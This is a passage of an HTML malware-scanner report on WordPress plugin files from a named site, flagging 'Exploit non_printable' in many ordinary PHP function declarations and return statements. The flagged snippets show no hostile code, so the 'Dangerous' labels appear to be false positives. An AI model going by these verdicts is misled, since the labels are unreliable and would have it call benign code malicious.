<span style="color: #0000BB"></span><span style="color: #007700">function () { </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">(.</span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">(</span><span style="color: #0000BB">$uniqid</span><span style="color: #007700">).</span><span style="color: #DD0000">'").bsf_tooltip("hide"); }) </script>'</span><span style="color: #007700">; } return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Icons'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Icons </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Icons</span><span style="color: #007700">; } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCod</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icon_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">stats Icon</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_icons_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 312</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_icon_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function () {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_337").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_info_circle.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_338" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } function </span><span style="color: #0000BB">add_info_circle</span><span style="color: #007700">() { if(</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$thumbnail_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Thumbnail'</span><span style="color: #007700">; </span><span style="color: #0000BB">$information_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Information Area'</span><span style="color: #007700">; </span><span style="color: #0000BB">$connector_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Connector'</span><span style="color: #007700">; </span><span style="color: #0000BB">$reponsive_tab </span><span style="color: #007700">= </span><span style="color: #DD0000">'Responsive'</span><span style="color: #007700">; </span><span style="color: #0000BB">vc_map</span><span style="color: #007700">( array( </span><span style="color: #DD0000">"name" </span><span style="color: #007700">=> </span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">"Info Circle"</span><span style="color: #007700">,</span><span style="color: #DD0000">"ultimate_vc"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_info_circle_assets</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 272</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_circle_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_circle</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_info_circle</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 363</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_338").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Switch.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_339" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_Switch_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_Switch_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_Switch_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">checkbox_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 67</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_339").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_ColorPicker.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_340" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'Ultimate_ColorPicker_Param'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$Ultimate_ColorPicker_Param </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_ColorPicker_Param</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">colorpicker_alpha_gen</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">colorpicker_alpha</span><span style="color: #007700">(</span><span style="color: #0000BB">selector</span><span style="color: #007700">,</span><span style="color: #0000BB">id_prefix</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">hex</span><span style="color: #007700">, </span><span style="color: #0000BB">opacity</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_340").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Spacing.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_341" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_spacing_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) { if(</span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post.php" </span><span style="color: #007700">|| </span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post-new.php"</span><span style="color: #007700">){ </span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">bsf_get_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'dev_mode'</span><span style="color: #007700">); if(</span><span style="color: #0000BB">$bsf_dev_mode </span><span style="color: #007700">=== </span><span style="color: #DD0000">'enable'</span><span style="color: #007700">) { </span><span style="color: #0000BB">wp_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate_spacing_css'</span><span style="color: #007700">, </span><span style="color: #0000BB">UAVC_URL</span><span style="color: #007700">.</span><span style="color: #DD0000">'admin/vc_extend/cs</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'add_shortcode_param'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 77</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_spacing_param_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #0000BB">$mode</span><span style="color: #007700">, </span><span style="color: #0000BB">$unit</span><span style="color: #007700">,</span><span style="color: #FF8000">/* $default_value,*/</span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 86</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">(</span><span style="color: #0000BB">$unit</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_341").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/params/Ultimate_Responsive.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_342" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">get_units</span><span style="color: #007700">(</span><span style="color: #0000BB">$unit</span><span style="color: #007700">) { </span><span style="color: #0000BB">$html </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="ultimate-unit-section">'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">' <label>'</span><span style="color: #007700">.</span><span style="color: #0000BB">esc_html</span><span style="color: #007700">( </span><span style="color: #0000BB">$unit </span><span style="color: #007700">).</span><span style="color: #DD0000">'</label>'</span><span style="color: #007700">; </span><span style="color: #0000BB">$html </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } function </span><span style="color: #0000BB">ultimate_admin_responsive_param_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) { if(</span><span style="color: #0000BB">$hook </span><span style="color: #007700">== </span><span style="color: #DD0000">"post.php" </span><span style="color: #007700">|| </span><span style="color: #0000BB">$hook</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
